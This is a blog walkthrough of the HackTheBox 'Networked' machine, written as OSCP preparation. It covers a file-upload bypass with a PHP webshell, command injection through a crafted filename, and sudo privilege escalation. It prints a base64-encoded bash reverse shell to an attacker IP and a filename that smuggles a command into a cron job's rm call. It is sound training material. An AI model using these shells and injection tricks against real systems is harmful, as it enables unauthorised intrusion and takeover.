Open in app

Sign in

Write

Sign in

Road to OSCP 7: Networked HackTheBox

Sharghaas
6 min readMay 24, 2021

Follow along in my OSCP journey, this is my target 7 of the TJNULL’s OSCP list.

How to use this walkthrough?

To avoid the typical answer on a plate type of walkthrough, I have decided to follow the TryHackMe idea of giving you some hints along the way to help you when you struggle and keep the Try Harder mantra real.

Let’s go!

Enumeration

I use Tib3rius’ multi-threaded Autorecon which combines a couple of different tools to enumerate and scan services. It creates a simple file structure and provides you a nice overview of the services scanned.

python3 /opt/AutoRecon/autorecon.py -cs 25 -vv -o /home/kali/Documents/HTB/lab/ 10.10.10.146

Autorecon

While it runs, I usually look at the _quick_tcp_nmap.txt file while we wait for the _full_tcp_nmap.txt

PORT    STATE  SERVICE REASON         VERSION
22/tcp  open   ssh     syn-ack ttl 63 OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 22:75:d7:a7:4f:81:a7:af:52:66:e5:27:44:b1:01:5b (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFgr+LYQ5zL9JWnZmjxP7FT1134sJla89HBT+qnqNvJQRHwO7IqPSa5tEWGZYtzQ2BehsEqb/PisrRHlTeatK0X8qrS3tuz+l1nOj3X/wdcgnFXBrhwpRB2spULt2YqRM49aEbm7bRf2pctxuvgeym/pwCghb6nSbdsaCIsoE+X7QwbG0j6ZfoNIJzQkTQY7O+n1tPP8mlwPOShZJP7+NWVf/kiHsgZqVx6xroCp/NYbQTvLWt6VF/V+iZ3tiT7E1JJxJqQ05wiqsnjnFaZPYP+ptTqorUKP4AenZnf9Wan7VrrzVNZGnFlczj/BsxXOYaRe4Q8VK4PwiDbcwliOBd
|   256 2d:63:28:fc:a2:99:c7:d4:35:b9:45:9a:4b:38:f9:c8 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAsf1XXvL55L6U7NrCo3XSBTr+zCnnQ+GorAMgUugr3ihPkA+4Tw2LmpBr1syz7Z6PkNyQw6NzC3KwSUy1BOGw8=
|   256 73:cd:a0:5b:84:10:7d:a7:1c:7c:61:1d:f5:54:cf:c4 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILMrhnJBfdb0fWQsWVfynAxcQ8+SNlL38vl8VJaaqPTL
80/tcp  open   http    syn-ack ttl 63 Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
443/tcp closed https   reset ttl 63

There is really only one interesting port here, let’s focus on port 80.

Web server — port 80

We can see in gobuster a couple of interesting URLs

/backup (Status: 301) [Size: 235]                                                                                                                                                                            /index.php (Status: 200) [Size: 229]                                                                                        /index.php (Status: 200) [Size: 229]                                                                                        /lib.php (Status: 200) [Size: 0]                                                                                            /photos.php (Status: 200) [Size: 1302]                                                                                      /upload.php (Status: 200) [Size: 169]                                                                                       /uploads (Status: 301) [Size: 236]

Let us see what they hold

We have an upload section

A backup of the site

we downloaded the backup and extracted it tar -xvf backup.tar

lib.php is just a library of functions.
photos.php shows the last 4 uploaded pictures
index.php returns the normal main page
upload.php is the main upload page
/uploads is where the pictures are stored

The path is clear we need to understand what the upload restrictions are and find a way to bypass them so we can upload a PHP webshell or reverse shell.

Can you create a webshell that bypasses those restrictions?

HINT

We can see that we need a valid mimetype, stay below 6000Kb and the extension needs to be .jpg, .png, .gif, .jpeg. One of these extensions is just better…

.

.

.

.

Gif baby!

File Upload Attacks- PHP Reverse Shell

So I've been crazy busy, taking the OSCP in 1 week! But I've been working on a lot of stuff, and one of them has been…

gobiasinfosec.blog

Let’s follow the tutorial and upload the webshell with the correct mime type.

We can see in the photos.php that whatever we upload the upload looks like this “uploaded_by_<IP>.<extension>

Let’s look for our webshell in /uploads

Let’s capture the request and worked directly inside Burp

Let’s get a reverse shell now!
Don’t forget to start your listener!

nc -nlvp 4444

We are in!

Getting User

Time for some shell upgrade 😉

  1. python -c ‘import pty; pty.spawn(“/bin/bash”)’
  2. Ctrl+Z
  3. stty raw -echo
  4. fg (nothing will show on the screen, just type enter after the command a couple of times)

Let’s do some recon!

We find an odd cron job in Guly’s home directory

HINT

What is the only thing we actually have influence on in this code.

.

.

.

.

$value, we can create files inside of the $path (/var/www/html/uploads)and the code will loop through them! It is then used in this beautiful line.

exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");

The simple idea is to create a file that executes a command that we want to run and we just play it like we’re doing a command injection bypass.

We try to create a file as a reverse shell but there is one constraint that is stopping us, “/” aren’t allowed in filenames.

HINT

Can you find a beautiful way to create a reverse shell bypassing ‘/’? What is the beloved technique used by powershell to encode its commands?

.

.

.

.

Transform them to BASE64!

echo 'bash -c "bash -i >& /dev/tcp/10.10.14.46/6666 0>&1"' | base64 -w0

Now we just need to create the file and wait ❤
Don’t forget the listener!!!

touch ";echo YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xOC83NzcgMD4mMSIK| base64 -d | bash"

We are Guly! Let’s own this server

Getting Root

The way I go about getting root is the following: I’ll look for some quick wins and then run some enumeration scripts to help me find some weaknesses.

Quick Wins

sudo -l → sudo permissions
ls -la /opt/ → looking for interesting executables or files
ls -la /var/www/; ls -la /var/www/html → possible configuration files with db pasword or even user password.
ls -la /etc/passwd; ls -la /etc/shadow → misconfigured permissions (write on passwd and read on shadow)

The first one is a charm!

What does that file do?

#!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
EoFregexp="^[a-zA-Z0-9_\ /-]+$"for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
        echo "interface $var:"
        read x
        while [[ ! $x =~ $regexp ]]; do
                echo "wrong input, try again"
                echo "interface $var:"
                read x
        done
        echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
done
  
/sbin/ifup guly0

It creates a file and then loops through 4 variables and asks the user to provide their value before writing them to the file.

This was a bit of a trial and error trying to understand how we were supposed to exploit this. After trying for a while, I found that adding a space in our input would execute the second part of the variable.

We own this place!

What did I learn?

  1. We learned how to bypass upload restrictions with the gif extension
  2. We learned about embedding code into filenames for execution
  3. We learned how to spot interesting weaknesses in code and abuse them

Stream

Don’t hesitate to join me and struggle together on those machines on my twitch stream Wednesdays and Sundays.

Oscp
Oscp Preparation
Hackthebox Walkthrough
Hackthebox Writeup
Oscp Certification

--

--

Sharghaas

Written by Sharghaas

29 Followers

Flying Squirrel that loves everything around hacking. Training for the OSCP exam come join me on my stream so we can struggle together twitch.tv/sharghaas

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams